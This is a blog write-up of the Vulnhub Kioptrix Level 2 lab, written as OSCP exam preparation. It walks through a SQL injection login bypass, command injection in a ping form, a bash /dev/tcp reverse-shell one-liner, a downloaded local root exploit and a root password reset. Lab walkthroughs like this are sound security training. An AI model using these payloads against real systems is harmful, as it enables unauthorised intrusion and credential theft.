Vulnhub | Kioptrix Level 2

Anas Ibrahim
5 min readSep 15, 2022
Kioptrix level 2

Welcome back

It’s time for level 2 . This write-up is for those who’re preparing for the OSCP exam , and to improve my documentation skills along the way . Follow along.

Machine link : Kioptrix level 2

My Methodology : (IP address — Service Enumeration — Web server enumeration — SQLi — Command injection — Reverse shell — Privilege escalation)

IP address

after installing the machine in your VMware , I want to know the IP address of it , So i used netdiscover command which built-in kali to know the live hosts on my network

netdiscover command so , the IP was

another method to know the live hosts , i used my bash script using nmap to grep the live IPs

#!/bin/bashnmap -sP | grep "for" | cut -d " " -f 5

Service Enumeration

I will use nmap tool to enumerate the ports/services , so i will use the following command

sudo nmap -sV -o scan  
  • sV: Probe open ports to determine service/version info
  • -o : save the output in file
nmap scan

SSH Enumeration

service’s version : OpenSSH 3.9p1

I used searchsploit to search for public vulnerabilities to this version and i found nothing about it.

Web service enumeration

Service’s version on port 80 : Apache httpd 2.0.52 ((centos)) , i will use nikto to get more information

Unfortunaltely i found nothing on port 443 to scan

Port 80 is where all the actions lies

Server : Apache/2.0.52 ((centos))

I will do directory fuzzing using dirsearch by using the following command

dirsearch -u --full-url --exclude-status=404,403,401,500

— exclude-status : Exclude status codes, separated by commas, support
ranges (Example: 301,500–599)

dirsearch tool


So , i will navigate to in my browser and i found remote system administration login page

admin login

I clicked on view page source to see if anything interesting and i found that the user is administrator

page source

first thing i will try sqli in the username and i will balance the query to exploit this vulnerability

I entered this balance query in username without any password and it succeeded

administrator’ or 1=1 — -

exploiting sqli

Command injection

So i found that next page had ping function which required you to give it an IP to ping it , so i entered and it pinged to the ip with 3 times maybe the command used -c 3 , let’s try to get command injection

i will concatenate with the ip command to execute both of them using ;

apache user

Command injection leads to LFI

So i can try to read /etc/passwd to see all the users exists in the system using the following command ;cat /etc/passwd


So i found that there were 2 users (john — harold)

i was trying to get the private key of them to connect ssh but i didn’t have the permission to do this

listing home directory

Command injection leads to RCE

I will use netcat to get reverse shell using pentestermonkey and i inject the following command ;bash -i >& /dev/tcp/ 0>&1

get shell with apache user

Privilege escalation

The best way to check Redhat version is using cat /etc/os-release command. All we need is to open the terminal and type cat /etc/os-release. It will list the Redhat OS distribution name and release version information. so i write the following command cat /etc/redhat-release

redhat release

I will searchsploit about Centos 4.5 to know if this version has privilege escalation public vulnerability or not

searchsploit centos 4.5
privilege escalation

So , i want to upload this exploit 9542.c to the machine to try it to get root access .

privilege escalation

searchsploit -p 9542.c -> to know the path of this exploit

sudo cp PATH . -> to copy the exploit to my current directory

python3 -m http.server -> to deploy a web server

then go to the machine and navigate to /tmp to download the exploit

the file saved as 9542.c.1 because the previous one saved as 9542.c

After downloading the exploit , compile it and execute using the following command gcc 9542.c -o 9542

get root access

Exploiting mysql

I navigated to /var/www/html to see the source code of index.php which has the database queries


I found that the database name was webapp , then username = john & password = Hiroshima, i will try to connect with these creds on mysql using the following command

mysql -u john -h localhost -p hiroshima
exploiting mysql

In our machine the used database called webapp , so try to dump all the users exists in the database.

dumping database

Changing password to connect to the original machine (kioptrix 2)

Changing password for user root.
New UNIX password: root
BAD PASSWORD: it is too short
Retype new UNIX password: root
passwd: all authentication tokens updated successfully.

then i connect to kioptrix 2 with username = root & new password = root

Congratulations, Machine hacked done.

Contact : LinkedIn